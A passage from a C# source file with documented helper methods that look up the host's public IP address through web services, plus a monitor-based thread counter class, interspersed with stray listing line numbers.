          if (candidate.AddressFamily.ToString() == "InterNetwork")
          {
              lastIpv4 = candidate.ToString();
          }
      }

      return lastIpv4;
  }
  3306.  
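  /// <summary>
  /// Asks an external "what is my IP" service for this host's public address.
  /// </summary>
  /// <returns>The address parsed from the response body.</returns>
  /// <exception cref="FormatException">
  /// Thrown by <see cref="IPAddress.Parse(string)"/> when the body is not an IP
  /// address. That includes the empty string left in place after a
  /// <see cref="WebException"/> has been logged.
  /// </exception>
  /// <remarks>
  /// The request goes out over plain HTTP, so the body can be altered in transit and
  /// must be treated as untrusted input; parsing it as an <see cref="IPAddress"/> is
  /// the only validation applied here.
  /// </remarks>
  public static IPAddress GetExternalIp()
  {
      string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
      UTF8Encoding utf8 = new UTF8Encoding();
      string requestHtml = "";

      // WebClient is disposable; the using block releases it on every path, which the
      // original code never did.
      using (WebClient wc = new WebClient())
      {
          try
          {
              requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp));
          }
          catch (WebException we)
          {
              // Best effort: the failure is logged and the empty body is parsed below.
              Console.Write(we.ToString());
          }
      }

      IPAddress externalIp = IPAddress.Parse(requestHtml);
      return externalIp;
  }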
  3326.  
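  /// <summary>
  /// Asks checkip.dyndns.org for this host's public address and parses it out of the
  /// returned HTML page.
  /// </summary>
  /// <returns>The address left after the fixed HTML wrapper text is removed.</returns>
  /// <exception cref="WebException">The request failed; it is not caught here.</exception>
  /// <exception cref="FormatException">
  /// The page did not match the expected wrapper, so the remainder is not an IP address.
  /// </exception>
  /// <remarks>
  /// The page is fetched over plain HTTP and is untrusted input. The wrapper is removed
  /// by exact string replacement, so any change in the page layout surfaces as a
  /// <see cref="FormatException"/>.
  /// </remarks>
  public static IPAddress GetExternalIp2()
  {
      string baseurl = "http://checkip.dyndns.org/";
      string s;

      // The using blocks release the client, stream and reader even when the read
      // throws; the original closed them only on the success path.
      using (WebClient client = new WebClient())
      {
          // Add a user agent header in case the requested URI contains a query.
          client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");

          using (Stream data = client.OpenRead(baseurl))
          using (StreamReader reader = new StreamReader(data))
          {
              s = reader.ReadToEnd();
          }
      }

      // Strip the fixed HTML around the address.
      s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "");

      IPAddress externalIp = IPAddress.Parse(s);
      return externalIp;
  }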
  3346.  
  /// <summary>
  /// Handler with the signature of <c>Compteur_thread.Lancer_Thread</c>. Takes the
  /// monitor on this instance and pulses it, waking one thread that is waiting on it.
  /// </summary>
  /// <param name="emetteur">Sender of the event; not used.</param>
  private void Lancer_Thread(object emetteur)
  {
      //Console.WriteLine("Evenement - Lancer_Thread");
      bool lockTaken = false;
      try
      {
          Monitor.Enter(this, ref lockTaken);
          // Console.WriteLine("DEBUG PULSE");
          Monitor.Pulse(this);
      }
      finally
      {
          if (lockTaken)
          {
              Monitor.Exit(this);
          }
      }
  }
  3356.  
  /// <summary>
  /// Counter protected by the monitor of the instance itself. Each public method
  /// records which operation is running, performs it, pulses the monitor and then
  /// marks the counter as free again.
  /// </summary>
  /// <remarks>
  /// The recorded operation starts as <see cref="Operation.Incrementer"/>. A first call
  /// to <see cref="Decrementer"/> or <see cref="Nb_thread"/> therefore waits on the
  /// monitor until another thread pulses it. The wait is performed once (an if, not a
  /// loop), so the condition is not re-checked after wake-up.
  /// </remarks>
  public class Compteur_thread
  {
      /// <summary>Operation recorded as currently running on the counter.</summary>
      public enum Operation
      {
          Incrementer = 1,
          Decrementer = 2,
          Nb_thread = 3,
          Libre = 4,
      }

      /// <summary>Signature of the handlers notified after a decrement.</summary>
      public delegate void Lancer_Thread(object emetteur);

      /// <summary>Raised by <see cref="Decrementer"/> while the monitor is still held.</summary>
      public event Lancer_Thread lancer_thread;

      // Operation most recently recorded; see the class remarks for the initial value.
      private Operation _currentOperation = Operation.Incrementer;

      // Current value of the counter.
      private int _count = 0;

      /// <summary>Adds one to the counter.</summary>
      public void Incrementer()
      {
          lock (this)
          {
              // Console.WriteLine("DEBUG INCREMENTER");
              WaitOnceIfRunning(Operation.Decrementer, Operation.Nb_thread);

              //Console.WriteLine("Incrementer");
              _currentOperation = Operation.Incrementer;
              _count++;

              Monitor.Pulse(this);
              _currentOperation = Operation.Libre;
          }
      }

      /// <summary>
      /// Subtracts one from the counter and raises <see cref="lancer_thread"/>.
      /// </summary>
      public void Decrementer()
      {
          lock (this)
          {
              // Console.WriteLine("DEBUG DECREMENTER");
              WaitOnceIfRunning(Operation.Incrementer, Operation.Nb_thread);

              //Console.WriteLine("decrementer");
              _currentOperation = Operation.Decrementer;
              _count--;

              // Handlers run inside the lock, as before.
              Lancer_Thread handlers = lancer_thread;
              if (handlers != null)
              {
                  handlers(this);
              }

              Monitor.Pulse(this);
              _currentOperation = Operation.Libre;
          }
      }

      /// <summary>Reads the current value of the counter.</summary>
      /// <param name="nb">Receives the counter value.</param>
      public void Nb_thread(out int nb)
      {
          lock (this)
          {
              // Console.WriteLine("DEBUG NB_THREAD");
              WaitOnceIfRunning(Operation.Incrementer, Operation.Decrementer);

              //Console.WriteLine("Nb_Thread classe");
              _currentOperation = Operation.Nb_thread;
              nb = _count;

              Monitor.Pulse(this);
              _currentOperation = Operation.Libre;
          }
      }

      // Waits once on the monitor when the recorded operation is one of the two given
      // ones. Must be called with the lock on this instance held. Both exception types
      // are logged and swallowed, after which the caller carries on.
      private void WaitOnceIfRunning(Operation first, Operation second)
      {
          if (_currentOperation != first && _currentOperation != second)
          {
              return;
          }

          try
          {
              Monitor.Wait(this);
          }
          catch (SynchronizationLockException e)
          {
              Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
          }
          catch (ThreadInterruptedException e)
          {
              Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
          }
      }
  }
  3473.  
  3474. }
  3475.  
  3476.  
  3477.  
  3478. }